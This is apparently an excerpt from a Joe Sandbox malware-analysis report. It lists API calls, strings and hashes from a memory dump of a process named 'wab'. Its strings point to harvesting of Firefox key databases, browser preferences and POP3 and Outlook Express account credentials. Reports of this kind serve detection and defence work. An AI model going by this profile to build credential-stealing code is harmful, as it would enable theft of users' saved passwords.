                                                                                                                                                                                                            • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                                                                                                                                                                                            • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                                                                                                                                                                                            • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Item$DialogMessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2485852401-0
                                                                                                                                                                                                          • Opcode ID: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                                          • Instruction ID: 8242765b3035aad42ded22ad072fa167e05c4db834e8c53cb5a522b966aec9bd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC619E70200A05AFDB21AF25C8C6A2BB7A5FF44724F00C23AF955A76D1E778A950CF95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                                                                                                                                                                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                                                                                                                                                                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040B202
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040B205
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3642520215-0
                                                                                                                                                                                                          • Opcode ID: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                                          • Instruction ID: 035281c2cfb68a6c78eb86e81ad7e7fbca9e62364f8fd823d381b3cb5a7ebbdd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7318175280708BFFA316B709C47FD6B795EB48B01F104829F3856A1E2CAF278909B58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                                          • Opcode ID: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                                          • Instruction ID: 8a5161a197c3c11310b51994d494e99affbcf27179d68dd4cd1e15cf4b4d4d3b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0431B471500605AFEB249F69C845D2AF7A8FF043547148A3FF219E72A1DB78EC508B54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                          • String ID: C@$key3.db$key4.db
                                                                                                                                                                                                          • API String ID: 581844971-2841947474
                                                                                                                                                                                                          • Opcode ID: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                                          • Instruction ID: 276f595f6d9fb14d306b90d89522efda4e53a8973e3769554d2ee0aec37c6aae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
• Instruction Fuzzy Hash: 5D21F9729041196ADF10AA66DC41FCE77ACDF11319F1100BBF40DF6091EE38DA958668
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?,?), ref: 0040B88E
• GetWindowRect.USER32(?,?), ref: 0040B8A4
• GetWindowRect.USER32(?,?), ref: 0040B8B7
• BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
• EndDeferWindowPos.USER32(?), ref: 0040B941
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClient
• String ID:
• API String ID: 2126104762-0
• Opcode ID: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
• Instruction ID: cf9ea3ecf4623016fd9dc3f5f3f1318dd3ce101ba80f5eccba740e206150479f
• Opcode Fuzzy Hash: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
• Instruction Fuzzy Hash: F221C276A00609FFDF118FA8DD89FEEBBB9FB08700F104065FA55A2160C7716A519F24
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(00000011), ref: 00407076
• GetSystemMetrics.USER32(00000010), ref: 0040707C
• GetDC.USER32(00000000), ref: 0040708A
• GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
• GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
• ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
• GetWindowRect.USER32(004012E4,?), ref: 004070BB
• MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
• String ID:
• API String ID: 1999381814-0
• Opcode ID: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
• Instruction ID: 4d379cb21657894a0e11cf9a22620d5233689a1bec75a9944306807f4dd79964
• Opcode Fuzzy Hash: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
• Instruction Fuzzy Hash: 8F11B735E00619AFDF108FB8CC49BAF7F79EB45351F040135EE01E7291DA70A9048A91
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
• API String ID: 1297977491-3883738016
• Opcode ID: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
• Instruction ID: fc76bc8343265493366407fdb1c4d707e5d8df4650a3499163c8513785776b89
• Opcode Fuzzy Hash: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
• Instruction Fuzzy Hash: 64128B71A04629DFDB14CF69E481AADBBB1FF08314F54419AE805AB341D738B982CF99
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset$strlen$_memicmp
• String ID: user_pref("
• API String ID: 765841271-2487180061
• Opcode ID: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
• Instruction ID: 5a65487526c3994ab00424e18f338503154a615df115d4cfef8f26f9df640fc7
• Opcode Fuzzy Hash: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
• Instruction Fuzzy Hash: 7F419AB6904118AEDB10DB95DC81FDA77AC9F44314F1042FBE605F7181EA38AF498FA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405813
• SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
• SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
• SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
• memset.MSVCRT ref: 004058AF
• SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
• SetFocus.USER32(?), ref: 00405965
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
• Opcode ID: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
• Instruction ID: b1c021a56b4f7756f2b42baa300122e183270d3e6e7f1cb1ff0d1441efe58172
• Opcode Fuzzy Hash: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
• Instruction Fuzzy Hash: 98411BB5D00109AFEB209F95DC81DAEBBB9FF04354F00406AE914B72A1D7759E50CFA4
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
• _mbscat.MSVCRT ref: 0040A65B
• sprintf.MSVCRT ref: 0040A67D
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: FileWrite_mbscatsprintfstrlen
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 1631269929-4153097237
• Opcode ID: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
• Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
• Opcode Fuzzy Hash: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
• Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84
Uniqueness

Uniqueness Score: -1.00%

APIs
• _mbscpy.MSVCRT ref: 00408BA2
  • Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2
• strlen.MSVCRT ref: 00408BC0
• LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
• memcpy.MSVCRT ref: 00408C2F
  • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
  • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
  • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
  • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19
Strings
• strings, xrefs: 00408B98
• <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408B3B
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
• String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
• API String ID: 4036804644-4125592482
                                                                                                                                                                                                          • Opcode ID: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                          • Instruction ID: 2fb35d0cb8d6515d264437a76ba5de351b7eb647a908b3ccb3b2e5853623431c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F3136B95003019FEB149B18EE40E323776EB59346B14443EF845A72B3DB39E815CB5C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E84
                                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,75C8E430,?), ref: 00407F2F
                                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                          • API String ID: 524865279-2190619648
                                                                                                                                                                                                          • Opcode ID: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                          • Instruction ID: 2c282e6ff88bd57be97cdb9cd65414afbc0c2375aa853475002addcb7488d922
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75316075A4025DAFDB11EB69CC81AEEBBBCEF45314F0080B6FA04A3141D6789F498F65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                          • API String ID: 2300387033-3849865405
                                                                                                                                                                                                          • Opcode ID: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                                          • Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                          • String ID: %s (%s)
                                                                                                                                                                                                          • API String ID: 3756086014-1363028141
                                                                                                                                                                                                          • Opcode ID: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                                          • Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                            • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                            • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                            • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                            • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                            • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                            • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004436F3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                          • String ID: .8D
                                                                                                                                                                                                          • API String ID: 1886237854-2881260426
                                                                                                                                                                                                          • Opcode ID: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                                          • Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408F5D
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00408F72
                                                                                                                                                                                                            • Part of subcall function 0040900D: memset.MSVCRT ref: 00409031
                                                                                                                                                                                                            • Part of subcall function 0040900D: GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                                            • Part of subcall function 0040900D: _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00408F99
                                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_00008ED5,00000000), ref: 00408FA9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
• String ID: caption$dialog_%d
• API String ID: 2923679083-4161923789
• Opcode ID: 000f1f906e92f5b03bb8d936c1600f8ee9725489ffd6e52dafee9c1c18951f52
• Instruction ID: 5193b431d0dc7ecedf7a364b2ddef3fe6b5aec68a3d00ff581056cac6fb231a4
• Opcode Fuzzy Hash: 000f1f906e92f5b03bb8d936c1600f8ee9725489ffd6e52dafee9c1c18951f52
• Instruction Fuzzy Hash: 67F0BB745043487FFB129BA0DD06FC97AA8AB08747F0000A6BB44F11E2DBF899908B5E
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• cannot release savepoint - SQL statements in progress, xrefs: 004260EE
• no such savepoint: %s, xrefs: 004260D0
• unknown error, xrefs: 00426E65
• abort due to ROLLBACK, xrefs: 00427E1B
• cannot open savepoint - SQL statements in progress, xrefs: 00426002
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
• API String ID: 3510742995-3035234601
• Opcode ID: f891372fe87baf48bda125dec3b2232890a750ac063dfed77912f4c4cabfec4f
• Instruction ID: 1b592f7810eb55fdfd9c77514c161e0aeb834189807bd0e5c0ad66af0c508e0f
• Opcode Fuzzy Hash: f891372fe87baf48bda125dec3b2232890a750ac063dfed77912f4c4cabfec4f
• Instruction Fuzzy Hash: 4CC15B70A04625DFDB18CFA9E485BA9BBB1FF08304F5540AFE405A7392D738A851CF99
Uniqueness

Uniqueness Score: -1.00%

APIs
• memcpy.MSVCRT ref: 00441F4B
  • Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memcmpmemcpy
• String ID: BINARY$NOCASE$RTRIM$main$temp
• API String ID: 1784268899-4153596280
• Opcode ID: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
• Instruction ID: db602eaa8e833254b0c0c9be43f42c24c685b457dfa8f14c56b0ec28138b2128
• Opcode Fuzzy Hash: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
• Instruction Fuzzy Hash: 5091E2B1900700AFE730AF25C981A9EBBE5AB44304F14492FF14697392C7B9A985CB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040F7DE,00000000,?), ref: 0040FB5E
• memset.MSVCRT ref: 0040FBBB
• memset.MSVCRT ref: 0040FBCD
  • Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A
• memset.MSVCRT ref: 0040FCB4
• _mbscpy.MSVCRT ref: 0040FCD9
• CloseHandle.KERNEL32(?,0040F7DE,?), ref: 0040FD23
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: memset$_mbscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3974772901-0
• Opcode ID: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
• Instruction ID: 4cd0dab2c11de29b1205cc267bdcfe4bbed2ca853fb67bca61950d18440e6937
• Opcode Fuzzy Hash: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
• Instruction Fuzzy Hash: 79511EB590021CABDB60DF95DD85ADEBBB8FF44305F1000BAE609A2281D7759E84CF69
Uniqueness

Uniqueness Score: -1.00%

APIs
• wcslen.MSVCRT ref: 00443559
• ??2@YAPAXI@Z.MSVCRT ref: 00443562
• WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
• strlen.MSVCRT ref: 004435BE
  • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
  • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
• memcpy.MSVCRT ref: 004435D8
• ??3@YAXPAX@Z.MSVCRT ref: 0044366B
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
• String ID:
• API String ID: 577244452-0
• Opcode ID: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
• Instruction ID: ed198900897cbedb477538fc3de06edee324e7a25cf08c3aedaf46951cf6a217
